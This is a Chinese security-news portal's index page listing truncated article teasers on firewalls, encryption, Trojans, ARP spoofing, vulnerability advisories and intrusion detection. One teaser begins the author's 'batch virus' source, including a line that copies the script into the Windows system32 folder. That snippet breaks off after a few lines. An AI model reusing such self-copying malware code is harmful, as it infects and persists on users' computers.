WCTA网络工程知识网 -- 网络安全

WCTA网络工程知识网>>网络安全

世界杯赛场之外的较量:FIFA网络 vs.黑客
随着世界杯开幕的日益临近,国际足球联盟(FIFA)的网络合作伙伴Avaya 预计黑客将对本届世界杯的网络发动攻击。 Avaya 欧洲、中东、非洲地区(EMEA)的业务开发经理琼斯表示,他预计恶意黑客将重新对FIFA的网络发动拒绝服务攻击。他本周四说,目前还没有发现值得关注的问题,他们已经邀请善意黑客对网络的安全性进行测试。 FIFA IT 解决方案部门的负责人迈克说,Avaya 和德意志电信...
网络安全:Cisco Security Monitoring, Analysis, and Response System 4.2(1)
Cisco® Security Monitoring, Analysis, and Response System是基于设备的全方位解决方案,可使您获得对现有安全部署的无与伦比的洞察力和控制力。作为思科安全管理生命周期的关键组成部分,Cisco Security Monitoring,Analysis, and Response System使您的安全和网络机构能够识别、管理并抵御安全威胁...
不容忽视 利用PGP加密技术保护电子邮件安全(1)
某日下午开会,领导提个问题:“我发给张总的邮件会不会被偷看呢?”为了显示一下自己多年从事信息安全管理的成绩,赶紧回答:“会的,不过加密后别人就看不到了。”领导又问怎么加密?明天给我讲讲吧! 于是挑灯夜战,准备了一夜,下面是我给他讲的一节“邮件加密”的笔录,各位读者朋友来看看吧。 邮件安全不容忽视恐怕大部分人在每天收发邮件时不会有这种担心。很多人都放心地认为无论是工作邮件也好,私人信件也好...
柯达称中消协非法律机构 拒绝接受协调方案
据新快报报道,身陷相机“质量门”事件的柯达,9月28日其全球副总裁兼北亚区主席叶莺首次回应“躲避”中消协听证会的真实原因。她表示,没去参加中消协的听证会,是因为中消协的免费换机方案,柯达没有理由接受;中消协不是中国的法律机构、不具法律效力,柯达也不是被告,更没有理由去“应诉”。 ...
补丁管理走向自动化
与安全预警保持同步、评估安全漏洞给企业网造成的风险、测试并部署补丁程序,是每一位网管员每天都必需面对的繁重工作。自动补丁管理系统通过自动跟踪需要修补的系统并在企业范围内部署所需要的补丁程序,可以将网管员从繁重的工作中解放出来。 自动补丁管理系统提供了一种为多种平台自动分发和安装补丁程序的解决方案,其核心功能包括准确的补丁管理检测和资产管理,以及跨平台的自动补丁部署。 498)this.st...
组网答疑:路由器能替代防火墙吗?
防火墙已经成为企业网络建设中的一个关键组成部分。但有很多用户,认为网络中已经有了路由器,可以实现一些简单的包过滤功能,所以,为什么还要用防火墙呢?以下我们针对防火墙与业界应用最多、最具代表性的路由器在安全方面的对比,来阐述为什么用户网络中有了路由器还需要防火墙。  一、两种设备产生和存在的背景不同 1、两种设备产生的根源不同  路由器的产生是基于对网络数据包路由而产生的。路由器...
VML缺陷利用代码网上曝光 用户需及时装补丁
利用Windows中一个安全缺陷的计算机代码已经被发布到了互联网上,使得用户下载、安装补丁软件显得更为紧迫了。 这一攻击代码利用了Windows处理矢量标记语言(VML)文档的方式中存在的一个缺陷,该缺陷存在Windows中一个名为vgx.dll的组件中。 微软在上周发布的MS07-004安全公告中提供了修正该缺陷的补丁软件,当时微软就警告称,它发现了有限的利用该缺陷的攻击活动,但代码并没有被...
大型IP电话安全设计(1)
  大型IP电话设计利用了SAFE中的大型网络设计。为了实现IP电话功能,对SAFE设计进行了某些修改,包括:   ·为研发和营销部门的数据网添加了基于PC的IP电话。   ·为语音邮件系统增加了一个语音网。   ·为边缘分布模块添加了用于本地呼叫的PSTN。   ·提高了服务器模块中呼叫处理网段的可用性,并在前面增加了一对状态防火墙...
UNIX入侵检测方法
因为UNIX系统经常承当着关键任务,所以它经常是入侵者攻击的首选目标。于是检测入侵、保护系统安全是管理员的最为重要的任务之一。那么,在没有其它工具帮助的情况下,如何去判断系统当前的安全性?如何去发现入侵呢?下面给大家介绍一些常用到的检查方法,以LINUX和solaris为例: 1、检查系统密码文件 首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。输...
XML-RPC for PHP远程代码注入漏洞
信息提供: 安全公告(或线索)提供热线:51cto.editor@gmail.com 漏洞类别: SQL注入漏洞 攻击类型: 远程进入系统 发布日期: 2005-06-30 更新日期: 2005-06-30 受影响系统: PostNuke PostNuke 0.76 RC4bPostNuke PostNuke 0.76...
传统防火墙存在的五大不足之处
  如今,知识渊博的黑客,均能利用网络防火墙开放的端口,巧妙躲过网络防火墙的监测,直接针对目标应用程序。他们想出复杂的攻击方法,能够绕过传统网络防火墙。据专家统计,目前70%的攻击是发生在应用层,而不是网络层。对于这类攻击,传统网络防火墙的防护效果,并不太理想。  传统的网络防火墙,存...
Windows操作系统常遇木马的预防技巧
木马程序是目前比较流行的一类病毒文件,它与一般的病毒不同,它不会自我繁殖,也并不刻意地去感染其他文件。它通过将自身伪装吸引用户下载执行,或以捆绑在网页中的形式,当用户浏览网页时受害。木马程序向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件和隐私,甚至远程操控被种者的电脑。木马的原理和计算机网络中常常要用到的远程控制软件相似,但由于远程控制软件是“善意”的控制,因此通常不...
Vista安全:EFS加密文件系统证书的导入与导出
EFS(加密文件系统)使用加密密钥对数据进行加密,加密密钥与证书绑定在一起。在Windows Vista中,首次加密计算机上的文件/文件夹后,Windows Vista将会自动为用户生成EFS证书,该证书与加密密钥相关联,EFS 使用该密钥来加密和解密数据。需要再次强调的是,对EFS而言,其加密密钥始终链接到一个特定的加密证书,而一旦加密密钥受损比如说意外删除时,加密数据将无法读取,因此,为保护您...
监控和保护Linux系统下进程安全
经典的信息保密性安全模型Bell-LaPadula模型指出,进程是整个计算机系统的一个主体,它需要通过一定的安全等级来对客体发生作用。进程在一定条件下可以对诸如文件、数据库等客体进行操作。如果进程用作其他不法用途,将给系统带来重大危害。在现实生活当中,许多网络黑客都是通过种植“木马”的办法来达到破坏计算机系统和入侵的目的,而这些“木马”程序无一例外的是需要通过进程这一方式在机器上运行才能发挥作用的...
如何通过SNMP协议监控天融信NGFW4000防火墙
498)this.style.width=498;' onmousewheel = 'javascript:return big(this)' height=144 alt="" src="/files/uploadimg/20070510/1708180.jpg" width=450 border=0> a. 假设你已经通过串口初始化了防火墙4000(配置接口IP、GUI...
Cisco防火墙技术汇总(1)
我们知道防火墙有四种类型:集成防火墙功能的路由器,集成防火墙功能的代理服务器,专用的软件防火墙和专用的软硬件结合的防火墙。Cisco的防火墙解决方案中包含了四种类型中的第一种和第四种,即:集成防火墙功能的路由器和专用的软硬件结合的防火墙。 一、 集成在路由器中的防火墙技术 1、 路由器IOS标准设备中的ACL技术 ACL即Access Control Lis t(访问控制列表),简称Ac...
XP SP2 自带防火墙设置详解(1)
目前已经发布的英文版windows xp service pack 2(sp2)包括了全新的windows防火墙,即以前所称的internet连接防火墙(icf)。windows防火墙是一个基于主机的状态防火墙,它丢弃所有未请求的传入流量,即那些既没有对应于为响应计算机的某个请求而发送的流量(请求的流量),也没有对应于已指定为允许的未请求的流量(异常流量)。windows防火墙提供某种程度的保护,...
ARP病毒解决办法
ARP病毒病毒发作时候的特征为,中毒的机器会伪造某台电脑的MAC地址,如该伪造地址为网关服务器的地址,那么对整个网络均会造成影响,用户表现为上网经常瞬断。 例子中的IP地址均为假设,正确的IP请查询或加入群13770791 一、在任意客户机上进入命令提示符(或MS-DOS方式),用arp –a命令查看: C:WINNTsystem32>arp -aInterface: 19...
系统安全之制作编写超级批处理病毒
网上的批处理病毒代码很少,我发一段我写的批处理给大家研究。我水平一般,也就只能写出这点东西了,大家多多包涵。废话不多说了,大家看代码,仅供研究,不要做坏事。 @echo off title You DEAD!!!!!!! set taskkill=s copy %0 %windir%\system32\cmd.bat attrib %windir%\system32...
拒绝掉线 防止ARP攻击路由器导购(1)
  目前无论是小区的家庭宽带,还是校园网,都经常受到ARP欺骗攻击,出现大面积的掉线现象,使得网络管理员不堪其苦,虽然通过多种方式临时解决了问题,但是时隔不长时间又会出现掉线的问题。如果使用一款能够防止ARP攻击的路由器,通过路由器内置功能,就可以非常方便的来管理网络内的机器,使其不再受到ARP欺骗攻击,这样就可以还网络一个清静的环境。  一、ARP欺骗攻击的原理  我们知道在网络中是通过...
怎样消灭冰河木马程序
电脑运行时经常出现sysexplr.exe 应用程序错误,提示应用程序正常初始化(oxc0000005)失败,请单击“确定”终止应用程序的字样。随后就会经常出现“Kernel32.exe运行错误”,有时候没运行任何程序时也会这样。已经用杀毒软件检查,但是没什么效果。 从以上描述的现象来看,应该是中了冰河木马程序。冰河的服务器端程序为G-server.exe,客户端程序为G-client.e...
10日病毒预报 谨防邮件蠕虫盗号木马依然猖獗
51CTO安全频道今日提醒您注意:在今天的病毒中“Excel拷贝虫”变种、“传奇大盗”变种、“龌龊虫”变种yp和“天堂杀手”变种值得关注。“Excel拷贝虫”变种是一个会假装成Excel图标的木马病毒。“传奇大盗”变种是一个盗取网络游戏“传奇”帐号的木马病毒。“龌龊虫”变种是群发带毒邮件的蠕虫病毒。“天堂杀手”变种是专门盗取“天堂”账号的木马程序。“Excel拷贝虫”变种U(Worm.FileCo...
广东国税网络安全解决方案(1)
一、广东国税计算机网络的组成 广东国税计算机网络可划分成两部分,一部分是内部网络,另一部分是外联网络。 内部网络指国税计算机信息网中不涉及与非国税部门直接进行信息交流的部分,它是国税计算机信息网的基本部分。在总体结构上完全依照国税机构的设置情况而建立。基本情况如下: 省局、地市局、县(区、县级市)局、分局分别建立计算机局域网络。省局局域网与每个地市局局域网之间分别通过一条租用电路(一般是DDN或F...
ATM安全(之五)
  ATM安全发报为了完成上述的安全服务,需要有相关的安全报文的传送机制,通过安全服务改变所采用的发报机制取决于是在连接建立时还是在连接生存期内要求服务。在连接建立时,安全报文可以经过信令通道或重新建立的数据通道进行交换。在连接生存期间,OAM信元用来承载安全报文。在连接建立时的安全发...
ATM安全 (之三)
  安全报文交换协议在二和三次安全报文交换协议中,协议的一方用户担负着“起动”的角色,另一方用户起着“响应”的角色。代表起动用户操作的“安全代理”就认为是“起动者”,代表响应用户操作的就认为是“响应者”。在安全报文交换协议中,当采用非对称性(公开)密钥算法时,可假定每个鉴别实体(即A、...


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 
27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 
53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 
79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 
本类别下相关标签: